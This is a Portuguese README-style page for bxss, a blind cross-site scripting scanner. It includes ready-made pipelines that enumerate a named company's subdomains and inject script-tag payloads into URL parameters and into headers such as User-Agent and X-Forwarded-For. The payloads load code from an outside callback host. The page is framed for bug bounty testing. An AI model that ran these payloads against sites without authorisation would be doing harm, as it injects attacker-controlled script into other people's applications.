
Blind XSS Scanner é uma ferramenta que pode ser usada para escanear vulnerabilidades de XSS cego em aplicações web.
Bxss é um scanner de Blind XSS de alto desempenho que automatiza a detecção de vulnerabilidades de Blind XSS em aplicações web.
Estamos trabalhando ativamente na integração de um pool de workers baseado em Chromium para melhorar o desempenho do bxss em dispositivos de baixo custo.
Esta funcionalidade permitirá que tarefas intensivas em recursos, como detecção de XSS baseado em DOM ou inspeção de payload pós-acionamento, sejam transferidas para instâncias leves do Chromium gerenciadas através de um pool. Ao distribuir a carga de trabalho por múltiplos contextos de navegador headless de forma controlada e eficiente, o bxss permanecerá responsivo e utilizável mesmo em máquinas de especificações mais baixas.
Isso tornará o bxss não apenas poderoso, mas também altamente acessível, independentemente das limitações do sistema.
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest
O Modo Trace é uma funcionalidade experimental que permite rastrear onde o BlindXSS foi acionado. Algumas plataformas de BlindXSS de terceiros, como o https://xss.report/, permitem que você especifique parâmetros personalizados nos seus payloads. Isso permite rastrear onde o BlindXSS foi acionado. Por exemplo, se você especificar o parâmetro url=https://somehost.com no seu payload, a ferramenta usará o payload:
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'
para teste e, ao ser acionado, você poderá inspecionar o DOM e ver de qual host o BlindXSS foi acionado.
Certifique-se de, ao atribuir parâmetros personalizados no seu painel, atribuir url={LINK} para que o bxss possa substituir automaticamente {LINK} pela URL real.
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t \
-rl 10
Para dorking avançado e exploração de vulnerabilidades, confira o Dorki e inscreva-se hoje!
Se você conseguir uma recompensa usando esta ferramenta, considere apoiar comprando um café para mim!
| Argumento | Descrição | Padrão |
|---|
-a | Anexar o payload ao parâmetro | false |
-c int | Definir o nível de concorrência | 30 |
-H string | Definir um cabeçalho personalizado | "" |
-hf string | Caminho para o arquivo com cabeçalhos | "" |
-p string | O payload de Blind XSS | "" |
-pf string | Caminho para o arquivo com payloads | "" |
-t | Testar parâmetros para Blind XSS | false |
-X string | Método HTTP a usar | "" |
-v | Ativar modo de depuração | false |
-rl float | Limite de taxa (requisições por segundo) | 0 |
-f | Seguir redirecionamentos | false |
-l | Ativar Modo Trace (experimental) | false |